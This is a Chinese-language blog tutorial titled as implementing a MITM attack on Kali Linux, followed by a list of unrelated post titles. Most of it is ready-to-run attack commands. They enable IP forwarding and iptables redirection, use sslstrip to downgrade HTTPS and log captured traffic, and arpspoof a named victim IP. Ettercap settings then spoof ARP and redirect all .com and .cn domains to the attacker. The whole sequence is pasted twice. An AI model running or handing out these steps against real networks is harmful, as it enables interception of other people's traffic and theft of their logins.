kai-linux 实现MITM攻击
来源:互联网 发布:最好的国外免费php空间 编辑:程序博客网 时间:2024/06/06 08:37
1. 为kali 设置开启端口转发
echo 1 >/proc/sys/net/ipv4/ip_forward
2. 设置ssltrip , 劫持SSL数据,该设置把https 变成http
2.1 使用iptables建立端口重定向
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 2000
2.2 使用ssltrip 进行劫持
sslstrip -l 2000 #让ssltrip 在端口2000上进行监听
tail -n 50 -f sslstrip.log# 新窗口输入该命令,查看攻击结果
3 查看网卡路由
1.ifconfig | grep "eth0" #过滤出以太网卡
2.route -n #查看充当子网网关的路由器的IP地址
route -n | awk '{print $2}' #直接输出默认网关
arpspoof -i eth0 -t 10.10.167.3 10.10.167.1
#受害者IP为10.10.167.3, 默认网关为10.10.167.1 , 保持该窗口,重开另外一个窗口执行其他操作
3.sslstrip -l 1000 # 新窗口中启动sslstrip
tail -n 50 -f sslstrip.log# 新窗口输入该命令,查看攻击结果
etterca-DNS、ARP欺骗
二、ettercap
1.arp欺骗
ettercap -G
vim /etc/ettercap/etter.conf ##启用另外一个终端去编辑命令
###################################################################
/Linux ##通过这个来查找
# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
# if you use iptables: #将这个三个#去掉
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
:wq #保存并退出
############################################################
echo 1 >/proc/sys/net/ipv4/ip_forward
2. DNS欺骗
vim /etc/ettercap/etter.dns ##启用另外一个终端去编辑命令
################################
# microsoft sucks ;)
# redirect it to www.linux.org
#
microsoft.com A 198.182.196.56
*.microsoft.com A 198.182.196.56
www.microsoft.com PTR 198.182.196.56 # Wildcards in PTR are not allowed
*.com A 192.168.1.128# 将所有com类型的网站重定向到本机
*.cn A 192.168.1.128# 将所有cn类型的网站重定向到本机
:wq
##########################################
ettercap -T -q -i eth0 -P dns_spoof // // # 开启DNS欺骗,// // 是所有网段
echo 1 >/proc/sys/net/ipv4/ip_forward
2. 设置ssltrip , 劫持SSL数据,该设置把https 变成http
2.1 使用iptables建立端口重定向
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 2000
2.2 使用ssltrip 进行劫持
sslstrip -l 2000 #让ssltrip 在端口2000上进行监听
tail -n 50 -f sslstrip.log# 新窗口输入该命令,查看攻击结果
3 查看网卡路由
1.ifconfig | grep "eth0" #过滤出以太网卡
2.route -n #查看充当子网网关的路由器的IP地址
route -n | awk '{print $2}' #直接输出默认网关
arpspoof -i eth0 -t 10.10.167.3 10.10.167.1
#受害者IP为10.10.167.3, 默认网关为10.10.167.1 , 保持该窗口,重开另外一个窗口执行其他操作
3.sslstrip -l 1000 # 新窗口中启动sslstrip
tail -n 50 -f sslstrip.log# 新窗口输入该命令,查看攻击结果
etterca-DNS、ARP欺骗
二、ettercap
1.arp欺骗
ettercap -G
vim /etc/ettercap/etter.conf ##启用另外一个终端去编辑命令
###################################################################
/Linux ##通过这个来查找
# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
# if you use iptables: #将这个三个#去掉
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
:wq #保存并退出
############################################################
echo 1 >/proc/sys/net/ipv4/ip_forward
2. DNS欺骗
vim /etc/ettercap/etter.dns ##启用另外一个终端去编辑命令
################################
# microsoft sucks ;)
# redirect it to www.linux.org
#
microsoft.com A 198.182.196.56
*.microsoft.com A 198.182.196.56
www.microsoft.com PTR 198.182.196.56 # Wildcards in PTR are not allowed
*.com A 192.168.1.128# 将所有com类型的网站重定向到本机
*.cn A 192.168.1.128# 将所有cn类型的网站重定向到本机
:wq
##########################################
ettercap -T -q -i eth0 -P dns_spoof // // # 开启DNS欺骗,// // 是所有网段
1 0
- kai-linux 实现MITM攻击
- kali linux 下使用ettercap实现MITM中间人攻击
- 初探MITM-中间人攻击
- MITM 中间人攻击
- SSL中间人攻击(MITM)
- SSL中间人攻击(MITM)
- DoS 与 MITM 攻击解说
- bettercap--优秀的MITM攻击测试框架
- 06-浅谈MITM攻击之信息窃取
- 浅谈MITM攻击之信息窃取(
- kali linux MITM 中间人欺骗
- kali 中间人攻击、ARP MITM、中间人攻击、Pass the Hash
- MITM(中间人攻击)原理及防范初探(一)
- MITM(中间人攻击)原理及防范初探(二)
- MITM(中间人攻击)原理及防范初探(二)
- 【小镇的技术天梯】黑客技术(1) MITM-中间人攻击
- MITM(中间人攻击)原理及防范初探(一)
- MITM(中间人攻击)原理及防范初探(二)
- oj 2701题与7无关的数
- AXI-Stream总线知识
- 使用pyinstaller打包python为exe文件
- CTime转换
- java相对路径与绝对路径
- kai-linux 实现MITM攻击
- 102、Binary Tree Level Order Traversal
- iOS高效开发必备的10款Objective-C类库
- Java通过JNI调用C++程序
- 正则表达式的威力5_网页爬虫,爬邮件地址
- 网站访问细节
- hdu 2063 过山车 二分匹配+hk算法
- 线程的阻塞以及优化
- JAVA基础知识(持续更新ing)